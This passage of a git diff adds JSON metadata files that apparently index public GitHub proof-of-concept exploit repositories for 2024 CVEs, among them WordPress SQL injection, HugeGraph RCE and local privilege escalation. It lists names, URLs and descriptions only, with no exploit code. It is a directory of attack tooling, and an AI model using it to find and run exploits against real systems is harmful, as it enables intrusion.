true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "application-security", + "bugbounty", + "bugbounty-tool", + "bugbountytips", + "cve-2024-27348", + "exploit", + "hack", + "hacking-tool", + "hugehraph", + "malware", + "one-day-exploit", + "penetration-testing-tools", + "platform-security", + "rce", + "security", + "unauthenticated", + "web-application-security", + "zero-day", + "zero-day-exploit" + ], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814037616, + "name": "CVE-2024-27348-Apache-HugeGraph-RCE", + "full_name": "jakabakos\/CVE-2024-27348-Apache-HugeGraph-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-27348-Apache-HugeGraph-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-12T08:14:39Z", + "updated_at": "2024-10-21T13:17:59Z", + "pushed_at": "2024-06-12T08:19:55Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27460.json b/2024/CVE-2024-27460.json new file mode 100644 index 0000000000..992b6af3af --- /dev/null +++ b/2024/CVE-2024-27460.json @@ -0,0 +1,95 @@ +[ + { + "id": 799487639, + "name": "CVE-2024-27460", + "full_name": "xct\/CVE-2024-27460", + "owner": { + "login": "xct", + "id": 9291767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9291767?v=4", + "html_url": "https:\/\/github.com\/xct", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xct\/CVE-2024-27460", + "description": "Plantronics Desktop Hub LPE", + "fork": false, + "created_at": "2024-05-12T09:53:07Z", + "updated_at": "2024-11-28T20:07:01Z", + "pushed_at": "2024-05-15T15:12:59Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 37, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 799923080, + "name": "CVE-2024-27460", + "full_name": "Alaatk\/CVE-2024-27460", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27460", + "description": "HP Plantronics Hub 3.2.1 Updater Privilege Escalation", + "fork": false, + "created_at": "2024-05-13T11:15:14Z", + "updated_at": "2024-05-18T05:33:59Z", + "pushed_at": "2024-05-14T13:55:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802330596, + "name": "CVE-2024-27460-installer", + "full_name": "10cks\/CVE-2024-27460-installer", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-27460-installer", + "description": null, + "fork": false, + "created_at": "2024-05-18T02:25:11Z", + "updated_at": "2024-05-18T02:26:11Z", + "pushed_at": "2024-05-18T02:26:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27462.json b/2024/CVE-2024-27462.json new file mode 100644 index 0000000000..b9dea082dc --- /dev/null +++ b/2024/CVE-2024-27462.json @@ -0,0 +1,33 @@ +[ + { + "id": 786007891, + "name": "CVE-2024-27462", + "full_name": "Alaatk\/CVE-2024-27462", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27462", + "description": "Wondershare MobileTrans 4.5.6 - Unquoted Service Path", + "fork": false, + "created_at": "2024-04-13T06:27:28Z", + "updated_at": "2024-04-17T11:52:07Z", + "pushed_at": "2024-04-13T06:34:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27474.json b/2024/CVE-2024-27474.json new file mode 100644 index 0000000000..ef97b165c4 --- /dev/null +++ b/2024/CVE-2024-27474.json @@ -0,0 +1,33 @@ +[ + { + "id": 782029434, + "name": "Leantime-POC", + "full_name": "dead1nfluence\/Leantime-POC", + "owner": { + "login": "dead1nfluence", + "id": 152615382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152615382?v=4", + "html_url": "https:\/\/github.com\/dead1nfluence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dead1nfluence\/Leantime-POC", + "description": "CVE-2024-27474, CVE-2024-27476, CVE-2024-27477", + "fork": false, + "created_at": "2024-04-04T13:58:33Z", + "updated_at": "2024-04-04T13:58:33Z", + "pushed_at": "2024-04-10T13:41:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27518.json b/2024/CVE-2024-27518.json new file mode 100644 index 0000000000..08e2b98b6d --- /dev/null +++ b/2024/CVE-2024-27518.json @@ -0,0 +1,33 @@ +[ + { + "id": 781492709, + "name": "CVE-2024-27518", + "full_name": "secunnix\/CVE-2024-27518", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-27518", + "description": "SUPERAntiSpyware Professional X <=10.0.1264 LPE Vulnerability PoC", + "fork": false, + "created_at": "2024-04-03T13:41:18Z", + "updated_at": "2024-04-03T13:42:31Z", + "pushed_at": "2024-04-04T18:01:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27564.json b/2024/CVE-2024-27564.json new file mode 100644 index 0000000000..06bc5bc1fd --- /dev/null +++ b/2024/CVE-2024-27564.json @@ -0,0 +1,64 @@ +[ + { + "id": 857682897, + "name": "SSRF-Exploit-CVE-2024-27564", + "full_name": "MuhammadWaseem29\/SSRF-Exploit-CVE-2024-27564", + "owner": { + "login": "MuhammadWaseem29", + "id": 161931698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161931698?v=4", + "html_url": "https:\/\/github.com\/MuhammadWaseem29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuhammadWaseem29\/SSRF-Exploit-CVE-2024-27564", + "description": null, + "fork": false, + "created_at": "2024-09-15T10:25:01Z", + "updated_at": "2024-09-19T00:54:29Z", + "pushed_at": "2024-09-15T11:55:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857770278, + "name": "CVE-2024-27564", + "full_name": "Quantum-Hacker\/CVE-2024-27564", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-27564", + "description": null, + "fork": false, + "created_at": "2024-09-15T15:11:54Z", + "updated_at": "2024-09-23T18:47:05Z", + "pushed_at": "2024-09-15T15:54:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27619.json b/2024/CVE-2024-27619.json new file mode 100644 index 0000000000..32889e4768 --- /dev/null +++ b/2024/CVE-2024-27619.json @@ -0,0 +1,33 @@ +[ + { + "id": 762818458, + "name": "dir-3040_dos", + "full_name": "ioprojecton\/dir-3040_dos", + "owner": { + "login": "ioprojecton", + "id": 46145992, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46145992?v=4", + "html_url": "https:\/\/github.com\/ioprojecton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ioprojecton\/dir-3040_dos", + "description": "CVE-2024-27619", + "fork": false, + "created_at": "2024-02-24T19:21:00Z", + "updated_at": "2024-03-05T14:45:29Z", + "pushed_at": "2024-03-29T17:01:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27630.json b/2024/CVE-2024-27630.json new file mode 100644 index 0000000000..b2b30ffeaa --- /dev/null +++ b/2024/CVE-2024-27630.json @@ -0,0 +1,33 @@ +[ + { + "id": 783101689, + "name": "CVE-2024-27630", + "full_name": "ally-petitt\/CVE-2024-27630", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27630", + "description": "CVE-2024–27630 Reference", + "fork": false, + "created_at": "2024-04-07T00:13:13Z", + "updated_at": "2024-04-07T23:41:31Z", + "pushed_at": "2024-04-07T01:16:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27631.json b/2024/CVE-2024-27631.json new file mode 100644 index 0000000000..59a925e01c --- /dev/null +++ b/2024/CVE-2024-27631.json @@ -0,0 +1,33 @@ +[ + { + "id": 783094631, + "name": "CVE-2024-27631", + "full_name": "ally-petitt\/CVE-2024-27631", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27631", + "description": "CVE-2024–27631 Reference", + "fork": false, + "created_at": "2024-04-06T23:30:01Z", + "updated_at": "2024-04-06T23:30:02Z", + "pushed_at": "2024-04-07T00:23:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27632.json b/2024/CVE-2024-27632.json new file mode 100644 index 0000000000..20b6340e7b --- /dev/null +++ b/2024/CVE-2024-27632.json @@ -0,0 +1,33 @@ +[ + { + "id": 783096643, + "name": "CVE-2024-27632", + "full_name": "ally-petitt\/CVE-2024-27632", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-27632", + "description": "CVE-2024–27632 Reference", + "fork": false, + "created_at": "2024-04-06T23:42:30Z", + "updated_at": "2024-04-08T03:11:14Z", + "pushed_at": "2024-04-07T00:12:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27665.json b/2024/CVE-2024-27665.json new file mode 100644 index 0000000000..e289c92783 --- /dev/null +++ b/2024/CVE-2024-27665.json @@ -0,0 +1,33 @@ +[ + { + "id": 770180757, + "name": "CVE-2024-27665", + "full_name": "Thirukrishnan\/CVE-2024-27665", + "owner": { + "login": "Thirukrishnan", + "id": 63901950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63901950?v=4", + "html_url": "https:\/\/github.com\/Thirukrishnan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Thirukrishnan\/CVE-2024-27665", + "description": null, + "fork": false, + "created_at": "2024-03-11T04:46:19Z", + "updated_at": "2024-03-11T04:46:19Z", + "pushed_at": "2024-03-11T09:55:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27673.json b/2024/CVE-2024-27673.json new file mode 100644 index 0000000000..89c5d18c3f --- /dev/null +++ b/2024/CVE-2024-27673.json @@ -0,0 +1,33 @@ +[ + { + "id": 781524986, + "name": "CVE-2024-27673", + "full_name": "Alaatk\/CVE-2024-27673", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27673", + "description": "ASUS Control Center Express =< 01.06.15 - Unquoted Service Path", + "fork": false, + "created_at": "2024-04-03T14:47:20Z", + "updated_at": "2024-04-17T11:50:01Z", + "pushed_at": "2024-04-03T15:00:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27674.json b/2024/CVE-2024-27674.json new file mode 100644 index 0000000000..c9d4aabf77 --- /dev/null +++ b/2024/CVE-2024-27674.json @@ -0,0 +1,33 @@ +[ + { + "id": 781539000, + "name": "CVE-2024-27674", + "full_name": "Alaatk\/CVE-2024-27674", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27674", + "description": "Macro Expert <= 4.9.4 - Insecure Permissions Privilege Escalation", + "fork": false, + "created_at": "2024-04-03T15:16:09Z", + "updated_at": "2024-04-17T11:53:20Z", + "pushed_at": "2024-04-03T15:20:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27697.json b/2024/CVE-2024-27697.json new file mode 100644 index 0000000000..701a61319a --- /dev/null +++ b/2024/CVE-2024-27697.json @@ -0,0 +1,33 @@ +[ + { + "id": 769730947, + "name": "FuguHub-8.4-Authenticated-RCE-CVE-2024-27697", + "full_name": "SanjinDedic\/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697", + "owner": { + "login": "SanjinDedic", + "id": 20748723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20748723?v=4", + "html_url": "https:\/\/github.com\/SanjinDedic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SanjinDedic\/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697", + "description": "Arbitrary Code Execution on FuguHub 8.4", + "fork": false, + "created_at": "2024-03-09T22:24:03Z", + "updated_at": "2024-12-09T12:16:00Z", + "pushed_at": "2024-03-11T03:09:35Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27766.json b/2024/CVE-2024-27766.json new file mode 100644 index 0000000000..caa449cbfe --- /dev/null +++ b/2024/CVE-2024-27766.json @@ -0,0 +1,33 @@ +[ + { + "id": 608607257, + "name": "CVE-2024-27766", + "full_name": "Ant1sec-ops\/CVE-2024-27766", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2024-27766", + "description": "Database authenticated code execution", + "fork": false, + "created_at": "2023-03-02T11:20:48Z", + "updated_at": "2024-10-18T17:50:40Z", + "pushed_at": "2024-09-04T13:14:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27804.json b/2024/CVE-2024-27804.json new file mode 100644 index 0000000000..96fee780c7 --- /dev/null +++ b/2024/CVE-2024-27804.json @@ -0,0 +1,33 @@ +[ + { + "id": 800535361, + "name": "CVE-2024-27804", + "full_name": "R00tkitSMM\/CVE-2024-27804", + "owner": { + "login": "R00tkitSMM", + "id": 78787782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78787782?v=4", + "html_url": "https:\/\/github.com\/R00tkitSMM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R00tkitSMM\/CVE-2024-27804", + "description": "POC for CVE-2024-27804", + "fork": false, + "created_at": "2024-05-14T14:17:06Z", + "updated_at": "2024-12-24T11:04:18Z", + "pushed_at": "2024-05-14T14:55:23Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 131, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27815.json b/2024/CVE-2024-27815.json new file mode 100644 index 0000000000..a4a60d08c5 --- /dev/null +++ b/2024/CVE-2024-27815.json @@ -0,0 +1,33 @@ +[ + { + "id": 817512745, + "name": "CVE-2024-27815", + "full_name": "jprx\/CVE-2024-27815", + "owner": { + "login": "jprx", + "id": 36464332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36464332?v=4", + "html_url": "https:\/\/github.com\/jprx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jprx\/CVE-2024-27815", + "description": "macOS\/ XNU kernel buffer overflow. Introduced in macOS 14.0 (xnu-10002.1.13), fixed in macOS 14.5 (xnu-10063.121.3)", + "fork": false, + "created_at": "2024-06-19T22:03:02Z", + "updated_at": "2024-12-10T13:34:18Z", + "pushed_at": "2024-06-20T17:23:22Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27821.json b/2024/CVE-2024-27821.json new file mode 100644 index 0000000000..9a2202a98b --- /dev/null +++ b/2024/CVE-2024-27821.json @@ -0,0 +1,33 @@ +[ + { + "id": 890033348, + "name": "CVE-2024-27821", + "full_name": "0xilis\/CVE-2024-27821", + "owner": { + "login": "0xilis", + "id": 109871561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109871561?v=4", + "html_url": "https:\/\/github.com\/0xilis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xilis\/CVE-2024-27821", + "description": "Writeup and PoC of CVE-2024-27821, for education purposes.", + "fork": false, + "created_at": "2024-11-17T20:56:41Z", + "updated_at": "2024-12-02T12:59:18Z", + "pushed_at": "2024-11-17T21:43:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27914.json b/2024/CVE-2024-27914.json new file mode 100644 index 0000000000..c74e61851c --- /dev/null +++ b/2024/CVE-2024-27914.json @@ -0,0 +1,33 @@ +[ + { + "id": 767361191, + "name": "CVE-2024-27914", + "full_name": "shellkraft\/CVE-2024-27914", + "owner": { + "login": "shellkraft", + "id": 89618500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89618500?v=4", + "html_url": "https:\/\/github.com\/shellkraft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellkraft\/CVE-2024-27914", + "description": null, + "fork": false, + "created_at": "2024-03-05T06:43:51Z", + "updated_at": "2024-11-07T06:48:04Z", + "pushed_at": "2024-03-05T14:31:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27954.json b/2024/CVE-2024-27954.json new file mode 100644 index 0000000000..26a59185eb --- /dev/null +++ b/2024/CVE-2024-27954.json @@ -0,0 +1,64 @@ +[ + { + "id": 880016834, + "name": "CVE-2024-27954", + "full_name": "gh-ost00\/CVE-2024-27954", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-27954", + "description": "Automatic Plugin for WordPress < 3.92.1 Multiples Vulnerabilities", + "fork": false, + "created_at": "2024-10-29T00:46:35Z", + "updated_at": "2024-12-17T20:19:31Z", + "pushed_at": "2024-10-29T02:47:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 880766464, + "name": "CVE-2024-27954", + "full_name": "Quantum-Hacker\/CVE-2024-27954", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-27954", + "description": null, + "fork": false, + "created_at": "2024-10-30T10:14:54Z", + "updated_at": "2024-10-30T10:33:37Z", + "pushed_at": "2024-10-30T10:32:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27956.json b/2024/CVE-2024-27956.json new file mode 100644 index 0000000000..7c99847254 --- /dev/null +++ b/2024/CVE-2024-27956.json @@ -0,0 +1,466 @@ +[ + { + "id": 792712180, + "name": "CVE-2024-27956", + "full_name": "truonghuuphuc\/CVE-2024-27956", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27956", + "description": " CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-04-27T11:03:36Z", + "updated_at": "2024-11-24T20:58:05Z", + "pushed_at": "2024-04-27T11:37:02Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794368729, + "name": "CVE-2024-27956-RCE", + "full_name": "diego-tella\/CVE-2024-27956-RCE", + "owner": { + "login": "diego-tella", + "id": 70545257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70545257?v=4", + "html_url": "https:\/\/github.com\/diego-tella", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diego-tella\/CVE-2024-27956-RCE", + "description": "PoC for SQL Injection in CVE-2024-27956", + "fork": false, + "created_at": "2024-05-01T01:58:28Z", + "updated_at": "2024-12-20T06:11:05Z", + "pushed_at": "2024-05-03T11:28:21Z", + "stargazers_count": 84, + "watchers_count": 84, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 84, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 795600666, + "name": "CVE-2024-27956-WORDPRESS-RCE-PLUGIN", + "full_name": "X-Projetion\/CVE-2024-27956-WORDPRESS-RCE-PLUGIN", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-27956-WORDPRESS-RCE-PLUGIN", + "description": "CVE-2024-27956 WORDPRESS RCE PLUGIN", + "fork": false, + "created_at": "2024-05-03T16:19:19Z", + "updated_at": "2024-05-03T16:31:26Z", + "pushed_at": "2024-05-03T16:31:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796391975, + "name": "CVE-2024-27956", + "full_name": "FoxyProxys\/CVE-2024-27956", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-27956", + "description": null, + "fork": false, + "created_at": "2024-05-05T19:50:54Z", + "updated_at": "2024-05-15T15:36:53Z", + "pushed_at": "2024-05-15T15:36:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797161822, + "name": "CVE-2024-27956", + "full_name": "k3ppf0r\/CVE-2024-27956", + "owner": { + "login": "k3ppf0r", + "id": 63085409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63085409?v=4", + "html_url": "https:\/\/github.com\/k3ppf0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3ppf0r\/CVE-2024-27956", + "description": "CVE-2024-27956", + "fork": false, + "created_at": "2024-05-07T10:07:00Z", + "updated_at": "2024-05-07T14:32:42Z", + "pushed_at": "2024-05-07T14:32:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + 